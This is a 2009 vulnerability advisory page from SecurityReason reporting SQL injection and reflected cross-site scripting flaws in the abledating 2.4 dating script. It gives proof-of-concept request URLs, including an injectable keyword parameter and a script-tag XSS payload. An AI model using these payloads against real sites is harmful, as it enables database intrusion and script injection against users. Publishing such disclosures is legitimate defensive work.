|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 5377 CVE : CVE-2008-6439 CVE : CVE-2008-6572 CWE : CWE-79 SecurityRisk : Low  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes Credit : Ali Jasbi Published : 10.03.2009
Advisory Content : By : Ali Jasbi ( hackerz.ir security & hacking team) vendor : abk-soft.com product name : abledating 2.4 Exploits : 1- Sql injection : bug : http://abledating//search_results.php?p_age_from=18&p_age_to=18&keyword= [sql injection]&status=online&save_search=on&search_name=My%20search&photo=on &p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4 &search test : http://abledating/search_results.php?p_age_from=18&p_age_to=18&keyword=% 00'&status=online&save_search=on&search_name=My%20search&photo=on&p_orie ntation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4&search 2-Cross site scripting : bug : http://abledating/search_results.php?p_orientation%5B%5D=2&p_age_from=18 &p_age_to=18&p_relation%5B%5D=on&keyword=>'><ScRiPt%20%0a%0d>alert(42119 .7535489005)%3B</ScRiPt>&status=online&save_search=on&search_name=My%20s earch&photo=on  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |